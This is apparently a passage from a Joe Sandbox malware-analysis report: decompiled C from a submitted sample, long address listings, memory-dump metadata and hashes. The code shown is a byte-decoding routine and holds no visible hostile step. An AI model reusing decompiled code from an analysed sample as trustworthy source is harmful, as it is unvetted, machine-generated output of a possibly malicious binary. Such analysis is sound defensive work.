										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                  0x00406194
                                                  0x0040619b
                                                  0x004061a1
                                                  0x004061a7
                                                  0x00000000
                                                  0x004061ab
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061c0
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061cd
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e2
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x0040622d
                                                  0x00406230
                                                  0x00406258
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406232
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624a
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a1
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062a6
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c3
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x00406309
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b1
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069e7
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069f0
                                                  0x004069f0
                                                  0x004069f4
                                                  0x00406ba3
                                                  0x00000000
                                                  0x00406ba3
                                                  0x00406a00
                                                  0x00406a07
                                                  0x00406a0f
                                                  0x00406a0f
                                                  0x00406a0f
                                                  0x00406a12
                                                  0x00406a15
                                                  0x00406a15
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x00000000
                                                  0x004063c0
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x004063a3
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x0040670b
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406962
                                                  0x00406b97
                                                  0x00406bb9
                                                  0x00406bbf
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                  • Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
                                                  • Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                  • Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004065D2 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004065D2() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
